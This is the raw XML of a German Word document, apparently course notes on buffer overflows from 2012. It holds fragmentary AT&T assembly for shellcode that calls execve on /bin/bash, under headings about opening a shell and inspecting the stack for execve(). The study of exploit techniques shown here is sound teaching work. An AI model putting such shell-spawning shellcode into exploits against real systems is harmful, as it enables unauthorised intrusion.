                              <w:t>Code zum Öffnen einer She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1" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:242.25pt;margin-top:19.5pt;width:2in;height:27.05pt;z-index:251666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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26">
                      <w:r>
                        <w:t>Code zum Öffnen einer Shell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/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> für </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() betrachten</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:r>
        <w:object w:dxaOrig="8012" w:dyaOrig="9544">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
            <v:imagedata r:id="rId16" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411797915" r:id="rId17"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assembler </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Equivalent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26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25620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>157606</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3200400" cy="5140199"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="12" name="Textfeld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00400" cy="514019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  <a:alpha val="80000"/>
                          </a:schemeClr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data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asciz</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> "/bin/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"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Null1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Null2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.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.</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>text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.</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>globl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> 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>_</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>start</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>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# </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Execve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routine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Bash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</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>AddrToBash</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ec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Null2, %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ed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# Exit Routine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Exit:</w:t>
                            </w:r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, %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>eax</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w:rsidR="0029267D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movl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> $10, %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ebx</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w:rsidR="008B1A26" w:rsidRDefault="0029267D" w:rsidP="0029267D">
                            <w:pPr>
                              <w:pStyle w:val="KeinLeerraum"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">        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$0x8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12" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:252pt;height:404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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="0029267D" w:rsidRDefault="0029267D" w:rsidP="0029267D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data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asciz</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> "/bin/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"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Null1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AddrToBash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Null2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.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>.</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>text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.</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>globl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> _</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>start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>_</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>start</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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# </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Execve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routine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ddrToBash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Bash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</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>AddrToBash</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ec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Null2, %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ed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# Exit Routine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Exit:</w:t>
                      </w:r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, %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>eax</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w:rsidR="0029267D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movl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> $10, %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ebx</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w:rsidR="008B1A26" w:rsidRDefault="0029267D" w:rsidP="0029267D">
                      <w:pPr>
                        <w:pStyle w:val="KeinLeerraum"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">        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$0x80</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRPr="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:sectPr w:rsidR="008B1A26" w:rsidRPr="008B1A26">
      <w:headerReference w:type="default" r:id="rId18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7EE5" w:rsidRDefault="00B47EE5" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B47EE5" w:rsidRDefault="00B47EE5" w:rsidP="00FC49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7EE5" w:rsidRDefault="00B47EE5" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B47EE5" w:rsidRDefault="00B47EE5" w:rsidP="00FC49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49EC" w:rsidRDefault="00FC49EC">
    <w:pPr>
      <w:pStyle w:val="Kopfzeile"/>
    </w:pPr>
    <w:r>
      <w:t>Jan Kevin Dick</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>Buffer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:t xml:space="preserve"> Overflow</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> TIME \@ "dd.MM.yyyy" </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00536AB5">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>15.10.2012</w:t>
    </w:r>
    <w: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0F192C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D866399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35F6FA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D21065DE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1B3758A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2512A3B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4D36AF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="402AFE5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456576A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77AEE18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01B2"/>
    <w:rsid w:val="00031A40"/>
    <w:rsid w:val="0029267D"/>
    <w:rsid w:val="004C01B2"/>
    <w:rsid w:val="00536AB5"/>
    <w:rsid w:val="008B1A26"/>
    <w:rsid w:val="00A52A11"/>
    <w:rsid w:val="00B47EE5"/>
    <w:rsid w:val="00E07EC2"/>
    <w:rsid w:val="00FC49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schriftung">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008B1A26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C49E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C49E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FC49E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FC49EC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fuzeile">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="FuzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC49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FC49EC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FC49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FC49EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma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FC49E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FC49E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C49E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enabsatz">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Standard"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00FC49EC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KeinLeerraum">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FC49EC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"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FC49E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schriftung">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008B1A26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292</Words>
  <Characters>1846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n Kevin Dick</dc:creator>
  <cp:lastModifiedBy>Jan Kevin Dick</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2012-10-15T07:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-10-15T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-10-15T07:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>